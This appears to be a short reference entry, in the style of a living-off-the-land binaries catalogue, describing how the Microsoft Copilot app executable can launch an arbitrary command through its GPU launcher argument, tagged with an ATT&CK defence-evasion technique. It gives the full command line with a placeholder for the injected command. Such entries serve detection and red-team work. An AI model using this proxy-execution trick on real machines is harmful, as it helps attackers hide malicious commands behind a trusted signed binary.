.. /Mscopilot.exe
Star

Execute (CMD)

Microsoft Copilot app

Paths:

Resources:

Acknowledgements:

Execute

  1. mscopilot.exe will spawn the provided command. Parent mscopilot.exe process needs to be killed to avoid command being executed an infinite number of times.

    mscopilot.exe --no-startup-window --disable-gpu-sandbox --gpu-launcher="{CMD} && taskkill /f /im mscopilot.exe &&"
    Use case

    Executes a process under a trusted Microsoft signed binary

    Privileges required
    User
    Operating systems
    Windows 11
    ATT&CK® technique
    T1218.015
    Tags
    Execute: CMD